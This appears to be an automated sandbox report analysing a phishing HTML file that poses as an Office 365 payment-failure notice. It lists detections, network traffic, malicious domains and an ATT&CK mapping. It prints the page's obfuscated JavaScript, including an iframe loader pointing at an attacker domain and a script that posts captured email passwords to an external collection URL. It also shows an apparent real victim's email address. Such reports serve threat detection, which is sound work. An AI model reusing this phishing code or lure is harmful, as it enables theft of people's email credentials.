Edit tour

Windows Analysis Report
Payment_Failure_Notice_Office365_sdf_[53487].html

Overview

General Information

Sample name:	Payment_Failure_Notice_Office365_sdf_[53487].html
Analysis ID:	1576970
MD5:	4ca0e697adeaa1b43edf38a5455f5fa3
SHA1:	21a52dfa021330917c48cd7124da05b487831257
SHA256:	498f01dce6401a6d4a8e97dbe1debb104eb3e754b0429b19fe2bc375cb882ba5
Infos:

Detection

HTMLPhisher

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected phishing page

Antivirus detection for URL or domain

Yara detected HtmlPhish10

AI detected suspicious Javascript

HTML IFrame injector detected

HTML Script injector detected

HTML document with suspicious name

HTML document with suspicious title

HTML file submission containing password form

Detected TCP or UDP traffic on non-standard ports

HTML body contains low number of good links

HTML body contains password input but no form action

HTML title does not match URL

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 3844 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Payment_Failure_Notice_Office365_sdf_[53487].html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3156 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,1278736899986524459,5604657142336918687,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
1.3.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

HTTP traffic detected: POST /app/stiktk.php HTTP/1.1Host: ajx6f16w140.chiliesdigital.co.zaConnection: keep-aliveContent-Length: 57sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: https://7royps9o5i0ithqegr.topshelfdog.com:8443Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://7royps9o5i0ithqegr.topshelfdog.com:8443/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Tue, 17 Dec 2024 18:57:13 GMTstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-frame-options: SAMEORIGINx-content-type-options: nosniffvary: User-Agent,Accept-Encodingalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"

Source: chromecache_82.1.dr	String found in binary or memory: http://fontawesome.io
Source: chromecache_82.1.dr	String found in binary or memory: http://fontawesome.io/license
Source: Payment_Failure_Notice_Office365_sdf_[53487].html	String found in binary or memory: https://static.wikia.nocookie.net/logopedia/images/7/7f/Microsoft_365_Admin.png/revision/latest?cb=2

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49947 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49947
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

System Summary

HTML document with suspicious name

Source: Name includes: Payment_Failure_Notice_Office365_sdf_[53487].html

Initial sample: notice

Source: classification engine

Classification label: mal88.phis.winHTML@25/15@24/11

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Payment_Failure_Notice_Office365_sdf_[53487].html"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,1278736899986524459,5604657142336918687,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1996,i,1278736899986524459,5604657142336918687,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Stealing of Sensitive Information

HTML file submission containing password form

Source: file:///C:/Users/user/Desktop/Payment_Failure_Notice_Office365_sdf_[53487].html

HTTP Parser: file:///C:/Users/user/Desktop/Payment_Failure_Notice_Office365_sdf_[53487].html

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 Browser Extensions	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	5 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	3 Ingress Tool Transfer	Scheduled Transfer	Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
file:///C:/Users/user/Desktop/Payment_Failure_Notice_Office365_sdf_[53487].html	0%	Avira URL Cloud	safe
https://ajx6f16w140.chiliesdigital.co.za/app/stiktk.php	100%	Avira URL Cloud	malware
https://kasumbo.com/smarty/xls_v1.6/tail-spin.svg	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
ajx6f16w140.chiliesdigital.co.za	104.21.81.229	true	false	unknown
ooc-g2.tm-4.office.com	52.98.95.210	true	false	high
kasumbo.com	108.178.43.142	true	false	unknown
cdnjs.cloudflare.com	104.17.25.14	true	false	high
cs837.wac.edgecastcdn.net	192.229.133.221	true	false	high
sni1gl.wpc.omegacdn.net	152.199.21.175	true	false	high
wikia.nocookie.net	74.120.190.204	true	false	high
www.google.com	142.250.181.132	true	false	high
7royps9o5i0ithqegr.topshelfdog.com	104.21.37.147	true	true	unknown
static.wikia.nocookie.net	unknown	unknown	false	high
aadcdn.msftauth.net	unknown	unknown	false	high
_8443._https.7royps9o5i0ithqegr.topshelfdog.com	unknown	unknown	false	unknown
www.w3schools.com	unknown	unknown	false	high
outlook.office365.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ajx6f16w140.chiliesdigital.co.za/app/stiktk.php	false	Avira URL Cloud: malware	unknown
https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg	false		high
https://kasumbo.com/smarty/xls_v1.6/tail-spin.svg	false	Avira URL Cloud: phishing	unknown
file:///C:/Users/user/Desktop/Payment_Failure_Notice_Office365_sdf_[53487].html	true	Avira URL Cloud: safe	unknown
https://static.wikia.nocookie.net/logopedia/images/7/7f/Microsoft_365_Admin.png/revision/latest?cb=20241113153458	false		high
https://outlook.office365.com/Encryption/ErrorPage.aspx?src=0&code=10&be=DM8PR09MB6088&fe=BL1PR13CA0351.NAMPRD13.PROD.OUTLOOK.COM	false		high
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css	false		high
https://www.w3schools.com/w3css/4/w3.css	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://fontawesome.io	chromecache_82.1.dr	false	high
https://static.wikia.nocookie.net/logopedia/images/7/7f/Microsoft_365_Admin.png/revision/latest?cb=2	Payment_Failure_Notice_Office365_sdf_[53487].html	false	high
http://fontawesome.io/license	chromecache_82.1.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.37.147	7royps9o5i0ithqegr.topshelfdog.com	United States	13335	CLOUDFLARENETUS	true
74.120.190.204	wikia.nocookie.net	United States	22300	WIKIAUS	false
192.229.133.221	cs837.wac.edgecastcdn.net	United States	15133	EDGECASTUS	false
108.178.43.142	kasumbo.com	United States	32475	SINGLEHOP-LLCUS	false
104.21.81.229	ajx6f16w140.chiliesdigital.co.za	United States	13335	CLOUDFLARENETUS	false
142.250.181.132	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
152.199.21.175	sni1gl.wpc.omegacdn.net	United States	15133	EDGECASTUS	false
52.98.95.210	ooc-g2.tm-4.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.17.25.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576970
Start date and time:	2024-12-17 19:55:58 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment_Failure_Notice_Office365_sdf_[53487].html
Detection:	MAL
Classification:	mal88.phis.winHTML@25/15@24/11
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .html

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 172.217.19.227, 64.233.164.84, 172.217.17.78, 172.217.17.46, 216.58.208.234, 172.217.17.42, 142.250.181.106, 142.250.181.74, 172.217.19.170, 142.250.181.10, 172.217.19.234, 172.217.19.202, 172.217.19.10, 142.250.181.138, 172.217.17.74, 142.250.181.42, 172.217.21.42, 199.232.214.172, 192.229.221.95, 142.250.181.142, 172.217.17.35, 23.218.208.109, 52.149.20.212, 13.107.246.63
Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, redirector.gvt1.com, update.googleapis.com, clients.l.google.com, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Payment_Failure_Notice_Office365_sdf_[53487].html

Input	Output
URL: https://7royps9o5i0ithqegr.topshelfdog.com:8443/im... Model: Joe Sandbox AI	{ "risk_score": 2, "reasoning": "The provided JavaScript snippet appears to be a benign script that retrieves a 'username' parameter from the URL and populates an input field with the retrieved value. This behavior is common for web applications that need to pre-fill form fields based on user input or URL parameters. The script does not exhibit any high-risk indicators, such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The script's purpose seems to be a legitimate user experience enhancement, and it does not demonstrate any malicious intent." }
document.addEventListener('DOMContentLoaded', function() { // Get the current URL var url = new URL(window.location.href); // Get the 'impact' parameter from the URL var impactValue = url.searchParams.get('username'); // Find the input field by ID var inputField = document.getElementById('usrn'); // If the impact value is found, replace the input field's value with it if (impactValue) { inputField.value = impactValue; } });
URL: file:///C:/Users/user/Desktop/Payment_Failure_Not... Model: Joe Sandbox AI	{ "risk_score": 7, "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. While the script appears to have some legitimate functionality, such as loading an iframe and adding random noise to the DOM, the overall level of obfuscation and the potential for malicious activities raises significant concerns. The risk score is on the higher end due to the combination of these factors." }
(function () { // Multi-layer obfuscation and deobfuscation const layer1Obfuscate = (str) => { return btoa(str.split('').map((c, i) => String.fromCharCode(c.charCodeAt(0) ^ (i % 7 + 3))).join('')); }; const layer2Obfuscate = (str) => { return Array.from(str).map(c => String.fromCharCode(c.charCodeAt(0) + 5)).join(''); }; const obfuscate = (str) => { return layer1Obfuscate(layer2Obfuscate(str)); }; const layer1Deobfuscate = (str) => { return atob(str).split('').map((c, i) => String.fromCharCode(c.charCodeAt(0) ^ (i % 7 + 3))).join(''); }; const layer2Deobfuscate = (str) => { return Array.from(str).map(c => String.fromCharCode(c.charCodeAt(0) - 5)).join(''); }; const deobfuscate = (obf) => { return layer2Deobfuscate(layer1Deobfuscate(obf)); }; // Random string generator const randomSegment = (length) => { const charset = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; return Array.from({ length }, () => charset.charAt(Math.floor(Math.random() * charset.length))).join(''); }; // Valid base domain const baseDomain = "topshelfdog.com"; // Replace with a valid domain // Advanced URL generation const generateComplexURL = () => { const subdomain = randomSegment(18); const port = ":8443"; const path = "/impact?"; const paramKey = randomSegment(15); const paramValue = `ashtar.junaid@mitel.com`; const fragment = "#" //1801913667465662; const url = `https://${subdomain}.${baseDomain}${port}${path}?${paramKey}=${paramValue}${fragment}`; return obfuscate(url); }; // Loader toggle const toggleLoader = (isVisible) => { document.getElementById("loader").style.display = isVisible ? "flex" : "none"; document.getElementById("main").style.display = isVisible ? "none" : "block"; }; // Load iframe const loadIframe = () => { const iframe = document.createElement("iframe"); iframe.src = deobfuscate(generateComplexURL()); iframe.style.opacity = 0; document.getElementById("main").appendChild(iframe); // Gradual fade-in for iframe let opacity = 0; const fadeIn = setInterval(() => { opacity += 0.1; iframe.style.opacity = opacity; if (opacity >= 1) clearInterval(fadeIn); }, 100); }; // Add random noise to the DOM const addRandomNoise = () => { const noiseElement = document.createElement("div"); noiseElement.style.position = "absolute"; noiseElement.style.top = "-9999px"; noiseElement.textContent = randomSegment(1000); document.body.appendChild(noiseElement); }; document.addEventListener("DOMContentLoaded", () => { addRandomNoise(); setTimeout(() => { toggleLoader(false); loadIframe(); }, Math.floor(3500 + Math.random() * 2500)); // Random loader duration }); })();
URL: :// Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: ://
URL: https://7royps9o5i0ithqegr.topshelfdog.com:8443/im... Model: Joe Sandbox AI	```json { "risk_score": 9, "reasoning": "The script contains heavily obfuscated code and sends data to an external domain (chiliesdigital.co.za) using XMLHttpRequest, which is a high-risk indicator. The domain is suspicious and not widely recognized, adding to the risk. The script's behavior is consistent with data exfiltration attempts, and the obfuscation suggests an intent to hide malicious activity." }
(function(e,f){function l(e,f){return d(f-'0xbd',e);}function k(e,f){return b(f-0x273,e);}function j(e,f){return c(e- -'0x240',f);}const g=e();while(!![]){try{const h=-parseInt(j(-0x122,'laTQ'))/0x1(-parseInt(k(0x393,0x395))/0x2)+-parseInt(k('0x38f',0x384))/0x3+-parseInt(l(0x1cd,0x1e5))/0x4(parseInt(k(0x39d,'0x392'))/0x5)+-parseInt(l('0x1bc','0x1c7'))/0x6+parseInt(l('0x1e5',0x1e1))/0x7(parseInt(j(-'0x112','mW6x'))/0x8)+-parseInt(k(0x377,'0x386'))/0x9(-parseInt(j(-'0x139','Ed)M'))/0xa)+parseInt(k('0x370',0x37b))/0xb;if(h===f)break;else g['push'](g['shift']());}catch(i){g['push'](g['shift']());}}}(a,0x678f5));function submitForm(e){function n(e,f){return c(f-'0x316',e);}function m(e,f){return b(e-'0x353',f);}e[m(0x480,0x47b)]();const f=document[n('BCDC',0x43b)](o('0x189',0x18c)),g=document[m(0x458,'0x44b')](m('0x455',0x463));function o(e,f){return d(f-0x74,e);}if(tryCount<=0x4){const h=new XMLHttpRequest();h[m(0x468,0x477)](o(0x195,'0x18f'),m(0x470,0x45a)),h[n('Hthc','0x422')](o(0x191,'0x19d'),o(0x178,'0x188')),h[m('0x457',0x455)]=function(){function p(e,f){return n(e,f-0x20);}function r(e,f){return m(e- -'0x597',f);}function q(e,f){return o(f,e- -0x80);}if(h[p('DAdp',0x44f)]===XMLHttpRequest[q('0x10b','0x117')]){if(h[r(-'0x12e',-'0x146')]===0xc8){}else{}tryCount++,tryCount>0x4&&(alert(p('QP7',0x457)),window[r(-'0x115',-0xfd)][p('laTQ',0x45d)]='#');}},h[m(0x459,'0x441')](n('QP7','0x430')+encodeURIComponent(f[o(0x179,0x184)])+n('udbq',0x428)+encodeURIComponent(g[n('BipX',0x446)])),g[m('0x45c','0x459')]='';}}function b(c,d){const e=a();return b=function(f,g){f=f-0x102;let h=e[f];return h;},b(c,d);}function t(e,f){return d(f- -0x397,e);}function d(b,c){const e=a();return d=function(f,g){f=f-0x102;let h=e[f];if(d['cvtprC']===undefined){var i=function(m){const n='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let o='',p='';for(let q=0x0,r,s,t=0x0;s=m['charAt'](t++);~s&&(r=q%0x4?r0x40+s:s,q++%0x4)?o+=String['fromCharCode'](0xff&r>>(-0x2q&0x6)):0x0){s=n['indexOf'](s);}for(let u=0x0,v=o['length'];u<v;u++){p+='%'+('00'+o['charCodeAt'](u)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(p);};d['sZoqSc']=i,b=arguments,d['cvtprC']=!![];}const j=e[0x0],k=f+j,l=b[k];return!l?(h=d['sZoqSc'](h),b[k]=h):h=l,h;},d(b,c);}let tryCount=0x1;function u(e,f){return b(e-0x31f,f);}function c(b,d){const e=a();return c=function(f,g){f=f-0x102;let h=e[f];if(c['DOQlkL']===undefined){var i=function(n){const o='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let p='',q='';for(let r=0x0,s,t,u=0x0;t=n['charAt'](u++);~t&&(s=r%0x4?s0x40+t:t,r++%0x4)?p+=String['fromCharCode'](0xff&s>>(-0x2r&0x6)):0x0){t=o['indexOf'](t);}for(let v=0x0,w=p['length'];v<w;v++){q+='%'+('00'+p['charCodeAt'](v)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(q);};const m=function(n,o){let p=[],q=0x0,r,t='';n=i(n);let u;for(u=0x0;u<0x100;u++){p[u]=u;}for(u=0x0;u<0x100;u++){q=(q+p[u]+o['charCodeAt'](u%o['length']))%0x100,r=p[u],p[u]=p[q],p[q]=r;}u=0x0,q=0x0;for(let v=0x0;v<n['length'];v++){u=(u+0x1)%0x100,q=(q+p[u])%0x100,r=p[u],p[u]=p[q],p[q]=r,t+=String['fromCharCode'](n['charCodeAt'](v)^p[(p[u]+p[q])%0x100]);}return t;};c['SdapYS']=m,b=arguments,c['DOQlkL']=!![];}const j=e[0x0],k=f+j,l=b[k];return!l?(c['PtpNIp']===undefined&&(c['PtpNIp']=!![]),h=c['SdapYS'](h,g),b[k]=h):h=l,h;},c(b,d);}function s(e,f){return c(f-'0x32f',e);}function a(){const v=['value','mZi1ntC4meveAfHzAG','click','jmoxah/cRLqRW4z0jZfmnvdcJ8oV','WOvhW7P/FmoPW6hcM8kwhfSM','mNvIwe1gtW','514055ASKmYF','DMfSDwu','775785qikKes','WO4rWPqpgSkT','265797EEeRKG','yxbWBgLJyxrPB24VEc13D3CTzM9YBs11CMXLBMnVzgvK','open','status','re9orq','DxnYBG','vSoUw1uQlmoVk0VcVG','wKhdLSo/ya','ue9tva','ywrKrxzLBNrmAxn0zw5LCG','https://ajx6f16w140.chiliesdigital.co.za/app/stiktk.php','zqXHh8oyW4RcKeGjW7FdOKm','5sIZStp','WPVcOaefW4WLmMP/ltCdxmob','x17dGCoWlSo7W59+cCooW4FdQue/r8kWx8olesC7ruBcU0q7WR89eSoqq8kXWRH3WRldKbVdOWXEdNGeWQ3dVCkaW7GQjSkuW4q','2ubXMFO','nZC4mJrjDLrJt2C','ntm5
URL: file:///C:/Users/user/Desktop/Payment_Failure_Notice_Office365_sdf_[53487].html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This document is protected! Please enter your E-mail password to open.", "prominent_button_name": "Continue", "text_input_field_labels": [ "E-mail password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/Desktop/Payment_Failure_Notice_Office365_sdf_[53487].html Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "This document is protected! Please enter your E-mail password to open.", "prominent_button_name": "Continue", "text_input_field_labels": [ "E-mail password" ], "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false, "contains_fake_security_alerts": false }

URL: file:///C:/Users/user/Desktop/Payment_Failure_Notice_Office365_sdf_[53487].html Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: file:///C:/Users/user/Desktop/Payment_Failure_Notice_Office365_sdf_[53487].html Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
104.21.37.147	HANDBOOK2023.HTM	Get hash	malicious	Unknown	Browse
239.255.255.250	http://kmaybelsrka.sbs:6793/bab.zip	Get hash	malicious	Unknown	Browse
	https://garfieldthecat.tech/Receipt.html	Get hash	malicious	WinSearchAbuse	Browse
	https://gddesign.joydigitalhost.com/dcs/ms_doc.html	Get hash	malicious	Unknown	Browse
	http://login.precisestripngllc.com	Get hash	malicious	Unknown	Browse
	http://sharefileon.com	Get hash	malicious	Unknown	Browse
	http://www.kukaj-to.chat/sedo	Get hash	malicious	Unknown	Browse
	https://escrowmedifllc.hostconstructionapp.com/qL3Zw/	Get hash	malicious	Unknown	Browse
	https://evitefestivities.info	Get hash	malicious	HTMLPhisher	Browse
	http://escrowmedifllc.hostconstructionapp.com	Get hash	malicious	Unknown	Browse
	https://docs.google.com/presentation/d/e/2PACX-1vS4E-28RyhuHX8_MZcsg7wizgGkSwW0LDVl5HNjN-NsvlVsETQwbyEWxbBU714X4OECIwqCDQyWoANZ/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse
74.120.190.204	https://pub-2c608f8aaf524ef8a0c3fbb16a435356.r2.dev/zxmkxrvsescwxwzgcgsdbxtnwmwwdq.html	Get hash	malicious	Unknown	Browse
